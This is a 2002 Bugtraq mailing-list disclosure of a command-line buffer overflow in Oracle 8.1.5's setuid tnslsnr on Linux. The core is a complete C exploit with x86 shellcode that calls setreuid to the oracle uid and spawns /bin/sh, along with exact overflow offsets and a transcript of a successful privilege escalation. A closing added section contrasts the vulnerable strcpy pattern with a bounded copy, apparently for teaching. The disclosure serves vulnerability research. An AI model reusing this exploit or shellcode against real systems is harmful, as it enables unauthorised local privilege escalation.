From dotslash@snosoft.com Wed Apr 3 12:34:07 2002
Date: Mon, 01 Apr 2002 10:22:43 -0500
From: KF
To: bugtraq, vuln-dev, recon@snosoft.com
Subject: Happy Easter / April Fools from Snosoft (Oracle 8.1.5 tnslsnr)

This is meant to be an April Fools joke, but if you still use old Oracle it's not too funny I guess:

After I ate a few too many hard boiled eggs this weekend I decided to install Oracle and play with it a little. Being poor I didn't have 800 bones to shell out on Oracle 16i so I had to settle with oldschool Oracle 8i from this little mom and pop shop on my corner. They just happened to have a copy that would run on linux and it was only 50 bucks so I bought it!

After the install, no more than 10 minutes later, I found an issue... I figured that most anything I would have found would already be public knowledge or it was patched up somewhere along the way to the current product version. Well, from what I can tell this is an unknown issue.

TNSLSNR for Linux: Version 8.1.5.0.0 - Production on 01-APR-02 11:46:53

[itchie@ghetto itchie]$ ls -al /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
-rwsr-s--x   1 oracle   oracle    4399723 Jun 11  1999 /home/u01/app/oracle/product/8.1.5/bin/tnslsnr

There were holes reported on the abuse of $ORACLE_HOME....
http://online.securityfocus.com/archive/1/140704
which tnslsnr had issues with, but these appeared patched on this install so I didn't bother trying to use env variables as abuse.

[dotslash@ghetto itchie]$ export ORACLE_HOME=`perl -e 'print "A" x 9000'`
[dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr
(no result...exit normally)

The first thing abnormal I tried hit right on the money... simple cmdline b0f

[dotslash@ghetto itchie]$ /home/u01/app/oracle/product/8.1.5/bin/tnslsnr `perl -e 'print "A" x 9000'`
Segmentation fault

Of course I had to give one of my developers a quick ring and try to harass him to stop molesting the Easter bunny and take a second to code me up an exploit.

Much obliged, "The Itch" took about 10 minutes (literally) to come up with the following...

Happy Easter! and April Fools?!

[itchie@ghetto tmp]$ cc -o tnslsnrx tnslsnrx.c
[itchie@ghetto tmp]$ id
uid=507(itchie) gid=507(itchie) groups=507(itchie)
[itchie@ghetto tmp]$ ./tnslsnrx
Oracle tnslsrn 8.1.5
Vulnerability found by KF / http://www.snosoft.com
Coded by The Itch / http://www.promisc.org

Using return address: 0xbffffaf4
Using buffersize : 2132
sh-2.05$ id
uid=515(oracle) gid=507(itchie) groups=507(itchie)

-KF

[ Part 2: "Attached Text" ]

/*
 * Yet another exploit for the 'Unbreakable' Oracle database
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Shellcode created by r0z / Promisc
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 * mail dotslash@snosoft.com if you wish to participate in vuln research.
 *
 * - The Itch
 * - itchie@promisc.org
 *
 * - Technical details concerning the exploit -
 *
 * 1). Buffer overflow occurs after writing more than 2132 bytes into the
 *     buffer at the command line (2128 to overwrite ebp, 2132 to
 *     overwrite eip).
 * 2). If you write more than 2132 bytes, other frames will be
 *     overwritten afterwards and will mess up your flow of arbitrary code
 *     execution. (It must be exactly 2132 bytes!)
 * 3). shellcode will try to do a setreuid(515);
 */

#include <stdio.h>     /* printf */
#include <stdlib.h>    /* malloc, atoi, exit, putenv */
#include <string.h>    /* strlen, memcpy */
#include <unistd.h>    /* execl */

#define DEFAULT_EGG_SIZE 4096
#define NOP 0x90

/* 2132 + 1 for the \0 at the end of the string */
#define DEFAULT_BUFFER_SIZE 2133

/* Shellcode made by r0z (r0z@promisc.org) */
char shellcode[] =
    "\x31\xdb"              /* xor    %ebx, %ebx     */
    "\x31\xc9"              /* xor    %ecx, %ecx     */
    "\xf7\xe3"              /* mul    %ebx           */
    "\xb0\x46"              /* mov    $0x46, %al     */
    "\x66\xbb\x03\x02"      /* mov    $0x203, %bx    (515 = oracle uid) */
    "\x49"                  /* dec    %ecx           */
    "\xcd\x80"              /* int    $0x80          */
    "\x31\xd2"              /* xor    %edx, %edx     */
    "\x52"                  /* push   %edx           */
    "\x68\x6e\x2f\x73\x68"  /* push   $0x68732f6e    */
    "\x68\x2f\x2f\x62\x69"  /* push   $0x69622f2f    */
    "\x89\xe3"              /* mov    %esp, %ebx     */
    "\x52"                  /* push   %edx           */
    "\x53"                  /* push   %ebx           */
    "\x89\xe1"              /* mov    %esp, %ecx     */
    "\x6a\x0b"              /* pushl  $0xb           */
    "\x58"                  /* pop    %eax           */
    "\xcd\x80";             /* int    $0x80          */

int main(int argc, char *argv[])
{
    char *buff;
    char *egg;
    char *ptr;
    long *addr_ptr;
    int bsize = DEFAULT_BUFFER_SIZE;
    int eggsize = DEFAULT_EGG_SIZE;
    int i;
    /* address of a local variable, used as the return address */
    int get_sp = (int)&get_sp;

    if(argc > 1) {
        bsize = atoi(argv[1]);
    }

    if(!(buff = malloc(bsize))) {
        printf("unable to allocate memory for %d bytes\n", bsize);
        exit(1);
    }

    if(!(egg = malloc(eggsize))) {
        printf("unable to allocate memory for %d bytes\n", eggsize);
        exit(1);
    }

    printf("Oracle tnslsrn 8.1.5\n");
    printf("Vulnerability found by KF / http://www.snosoft.com\n");
    printf("Coded by The Itch / http://www.promisc.org\n\n");
    printf("Using return address: 0x%x\n", get_sp);
    printf("Using buffersize    : %d\n", bsize - 1);

    /* fill the argument buffer with the return address */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for(i = 0; i < bsize; i += 4) {
        *(addr_ptr++) = get_sp;
    }

    /* build the egg: NOP sled followed by the shellcode */
    ptr = egg;
    for(i = 0; i < eggsize - strlen(shellcode) - 1; i++) {
        *(ptr++) = NOP;
    }
    for(i = 0; i < strlen(shellcode); i++) {
        *(ptr++) = shellcode[i];
    }
    egg[eggsize - 1] = '\0';
    memcpy(egg, "EGG=", 4);
    putenv(egg);

    buff[bsize - 1] = '\0';
    execl("/home/u01/app/oracle/product/8.1.5/bin/tnslsnr", "tnslsnr", buff, (char *)NULL);
    return 0;
}
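As an added illustration that is not part of the original post or the exploit above: the bug class behind the crash (an argv string copied into a fixed-size stack buffer with no bound) beside a hardened form that refuses an over-long argument. The 2128-byte buffer and the 9000-byte test input mirror the numbers in the post; ARG_BUF, parse_arg_unsafe, parse_arg_safe and try_arg_of_length are hypothetical names, not tnslsnr's code.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Buffer size mirroring the post: byte 2128 hits saved ebp, 2132 saved eip. */
#define ARG_BUF 2128
/* Vulnerable pattern (bug class only, not tnslsnr's code): argv text is
 * copied into a fixed stack buffer with no bound, so 2132+ bytes reach eip. */
int parse_arg_unsafe(const char *arg)
{
    char buf[ARG_BUF];
    strcpy(buf, arg);                  /* unbounded copy: the defect */
    return (int)strlen(buf);
}

/* Hardened form: bounded scan, refuse what does not fit, always terminate.
 * Returns 0 when accepted, -1 when rejected. */
int parse_arg_safe(const char *arg, char *out, size_t outsz)
{
    size_t n;
    if (arg == NULL || outsz == 0) return -1;
    for (n = 0; n < outsz && arg[n] != '\0'; n++) ;   /* never read past outsz */
    if (n >= outsz) return -1;         /* would overflow or lose the NUL */
    memcpy(out, arg, n);
    out[n] = '\0';
    return 0;
}

/* Builds a constructed argument of `len` 'A' bytes, like the post's
 * perl -e 'print "A" x 9000', and returns the safe parser's verdict. */
int try_arg_of_length(size_t len)
{
    char buf[ARG_BUF];
    char *arg = malloc(len + 1);
    int rc;
    if (arg == NULL) return -2;
    memset(arg, 'A', len);
    arg[len] = '\0';
    rc = parse_arg_safe(arg, buf, sizeof buf);
    free(arg);
    return rc;
}

int main(void)
{
    printf("2127 bytes -> %d, 2132 bytes -> %d, 9000 bytes -> %d\n",
           try_arg_of_length(2127), try_arg_of_length(2132), try_arg_of_length(9000));
    return parse_arg_unsafe("LSNRCTL") == 7 ? 0 : 1;   /* short literal only */
}
```

The safe parser rejects anything of ARG_BUF bytes or more, so the 2128-byte (saved ebp) and 2132-byte (saved eip) inputs from the post never reach the copy.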